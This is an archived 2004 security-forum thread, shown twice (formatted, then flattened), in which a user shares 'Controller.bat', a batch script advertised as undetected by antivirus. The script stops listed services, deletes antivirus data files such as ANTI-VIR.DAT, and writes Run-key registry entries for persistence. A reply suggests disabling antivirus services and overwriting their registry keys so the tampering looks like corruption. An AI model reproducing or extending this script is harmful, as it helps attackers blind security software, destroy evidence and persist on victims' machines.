Service Killer Update (undetected By Av)

Full Version: Service Killer Update (undetected By Av)

GovernmentSecurity.org > System Security > Windows Systems

kbnet

Oct 29 2004, 07:46 PM

Heres an update for the service killer. (still remains undetected by AntiViruses)

Now is capable of deleting log files and adding keys (will overwrite keys
if they exist) to the registry.

Here is the main code:

Controller.bat
-=--=-=-=-=-=-
@echo off
SET SRV_LST=services.lst
SET DEL_LOG=logs.lst
SET REG_MOD=regmods.lst

FOR /F "skip=1 eol=> tokens=1 delims=" %%a IN (%SRV_LST%) DO (@net stop %%a /y)
FOR /F "skip=1 eol=> tokens=1 delims=" %%b IN (%DEL_LOG%) DO (@del %%b /s)
FOR /F "skip=1 eol=> tokens=1 delims=" %%c IN (%REG_MOD%) DO (@reg add %%c /f)
-=-=-=-=-=-=-==

! make sure u leave a blank line at the top of the log files !

Example of logs.lst:
-=-=-=-=-

c:\*ANTI-VIR*.DAT
c:\*CHKLIST*.DAT
=-=-=-=-=

Example of regmods.lst (keeps these reg keys one per line, these keys will be added to the registry)
-=-=-=-=-

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v loadcalc /t REG_SZ /d calc.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v loadnote /t REG_SZ /d notepad.exe
-=-=-=-=-

If anyone puts together some good log files let me know.

Cheers

untouchable

Oct 29 2004, 09:05 PM

nice idea man thx for the share

kbnet

Oct 29 2004, 10:10 PM

what alot of you should note about things like this is that you should replace alot of your windows commands. For example, ive replaced commands such as reg.exe and format.com on my system with my own versions so i can capture any paramters which are sent to them. Then I can decide whether I would still like to execute them.

If anyone has anymore suggestions for developing my service killer script further please let me know.

st3@1th

Oct 30 2004, 02:30 PM

QUOTE(kbnet @ Oct 29 2004, 10:10 PM)

While your at it replace the net stop command with a better service editing tool that will let you disable the service altogether instead of just stopping it.

If you wanted to really do something useful, research the reg services keys for a the major AV products and then include those in your script. If you overwrite enough of them it will look the service got corrupted rather than just stopped which is more suscpicious.

BTW saying that it is undetected by AVs is a little absurd, its not mobile code or even malicious for that matter. Almost any installation will start and stop services modify the registyr etc.

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.


Help - Search - Member List - Calendar Full Version: Service Killer Update (undetected By Av) GovernmentSecurity.org > System Security > Windows Systems kbnet Oct 29 2004, 07:46 PM Heres an update for the service killer. (still remains undetected by AntiViruses) Now is capable of deleting log files and adding keys (will overwrite keys if they exist) to the registry. Here is the main code: Controller.bat -=--=-=-=-=-=- @echo off SET SRV_LST=services.lst SET DEL_LOG=logs.lst SET REG_MOD=regmods.lst FOR /F "skip=1 eol=> tokens=1 delims=" %%a IN (%SRV_LST%) DO (@net stop %%a /y) FOR /F "skip=1 eol=> tokens=1 delims=" %%b IN (%DEL_LOG%) DO (@del %%b /s) FOR /F "skip=1 eol=> tokens=1 delims=" %%c IN (%REG_MOD%) DO (@reg add %%c /f) -=-=-=-=-=-=-== ! make sure u leave a blank line at the top of the log files ! Example of logs.lst: -=-=-=-=- c:\ANTI-VIR.DAT c:\CHKLIST.DAT =-=-=-=-= Example of regmods.lst (keeps these reg keys one per line, these keys will be added to the registry) -=-=-=-=- HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v loadcalc /t REG_SZ /d calc.exe HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v loadnote /t REG_SZ /d notepad.exe -=-=-=-=- If anyone puts together some good log files let me know. Cheers untouchable Oct 29 2004, 09:05 PM nice idea man thx for the share kbnet Oct 29 2004, 10:10 PM what alot of you should note about things like this is that you should replace alot of your windows commands. For example, ive replaced commands such as reg.exe and format.com on my system with my own versions so i can capture any paramters which are sent to them. Then I can decide whether I would still like to execute them. If anyone has anymore suggestions for developing my service killer script further please let me know. st3@1th Oct 30 2004, 02:30 PM QUOTE(kbnet @ Oct 29 2004, 10:10 PM) what alot of you should note about things like this is that you should replace alot of your windows commands. For example, ive replaced commands such as reg.exe and format.com on my system with my own versions so i can capture any paramters which are sent to them. Then I can decide whether I would still like to execute them. While your at it replace the net stop command with a better service editing tool that will let you disable the service altogether instead of just stopping it. If you wanted to really do something useful, research the reg services keys for a the major AV products and then include those in your script. If you overwrite enough of them it will look the service got corrupted rather than just stopped which is more suscpicious. BTW saying that it is undetected by AVs is a little absurd, its not mobile code or even malicious for that matter. Almost any installation will start and stop services modify the registyr etc. This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.